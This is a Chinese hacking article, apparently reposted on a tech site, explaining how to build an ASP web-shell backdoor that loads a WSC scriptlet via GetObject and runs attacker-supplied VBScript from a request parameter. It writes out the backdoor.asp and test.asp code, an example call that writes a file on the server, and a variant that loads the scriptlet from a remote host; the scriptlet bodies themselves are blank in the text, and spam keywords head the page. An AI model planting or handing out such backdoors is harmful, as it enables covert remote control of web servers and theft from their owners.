自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

利用wsc來(lái)做一個(gè)asp后門(mén)及后續(xù)

安全 黑客攻防
利用wsc來(lái)做一個(gè)asp后門(mén)及后續(xù)……

ScriptCodingInfo.wsc代碼如下,該文件可以改成任意后綴:

以下是引用片段:









backdoor.asp內(nèi)容如下:

以下是引用片段:
<%
b=request("a")
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx(b)
%>

調(diào)用方法如下:

以下是引用片段:
http://url/backdoor.asp?a=CreateObject("Scripting.FileSystemObject").
OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")

注意這里的a=只能是vbs的代碼,不可以接受像response、request之類的asp的東東。如果是2000服務(wù)器可以在backdoor.asp遠(yuǎn)程調(diào)用ScriptCodingInfo.wsc,像Set fs = GetObject("script:http://www.xx.com/ScriptCodingInfo.wsc#haiyangtop")

2003服務(wù)器中不可以。算一個(gè)思路,雞肋,誰(shuí)有更好的辦法完善,能夠直接調(diào)用cs的asp木馬的c端就好了。
#p#

突然看到了lcx巨形牛頭人發(fā)了一個(gè)帖子
http://hi.baidu.com/myvbscript/blog/item/62e6204e4805dacdd0c86a6a.html
但是就像牛頭人所說(shuō)的,沒(méi)有加進(jìn)request和response類很不爽。于是我作了一個(gè)簡(jiǎn)單的修改。

ScriptCodingInfo.wsc 代碼

以下是引用片段:









test.asp代碼:

<% 
b=request("a")
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx b,request,response
%>

測(cè)試方法:

以下是引用片段:

不知道這是不是lcx巨形牛頭人所說(shuō)的那個(gè)c端。我一直不太理解“能夠直接調(diào)用cs的asp木馬的c端就好了”lcx巨牛的這句話的意思
如果改成
Set fs = GetObject(request("b"))
然后用

以下是引用片段:
wsc%23haiyangtop&c=phpeval

這樣好象更有誘惑性。

【編輯推薦】

  1. 4.1.7 使用SQLRootKit網(wǎng)頁(yè)數(shù)據(jù)庫(kù)后門(mén)控制案例
  2. 入侵Windows2000系統(tǒng)放置后門(mén)的方法
  3. Linux下的后門(mén)和日志工具
責(zé)任編輯:佚名 來(lái)源: 黑客風(fēng)云
相關(guān)推薦

2011-12-20 10:02:01

ASP.NET

2015-07-03 11:27:30

程序員自己神器

2012-12-17 12:58:18

WebjQuery重構(gòu)

2017-06-30 15:18:24

對(duì)賬系統(tǒng)互聯(lián)網(wǎng)

2019-09-10 09:12:54

2020-05-26 10:38:51

安全 黑客Windows

2016-11-23 18:13:44

javascriptrxjsreactivex

2011-02-28 09:22:47

SQLite記賬簿

2018-01-04 16:04:35

圓環(huán)放大動(dòng)畫(huà)

2021-12-17 10:06:42

鴻蒙HarmonyOS應(yīng)用

2017-06-19 08:30:35

大數(shù)據(jù)數(shù)據(jù)可視化報(bào)表

2019-04-22 10:25:52

程序員技術(shù)職場(chǎng)

2020-07-20 10:00:52

Python翻譯工具命令行

2021-12-01 07:02:55

Python 記錄器按鍵

2014-04-29 10:50:16

池建強(qiáng)

2018-06-08 16:18:43

Python微信聊天機(jī)器人

2021-12-19 22:00:31

APP軟件開(kāi)發(fā)開(kāi)發(fā)

2011-10-27 21:13:28

2022-03-30 15:11:26

Python房?jī)r(jià)工具

2012-04-10 16:26:46

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)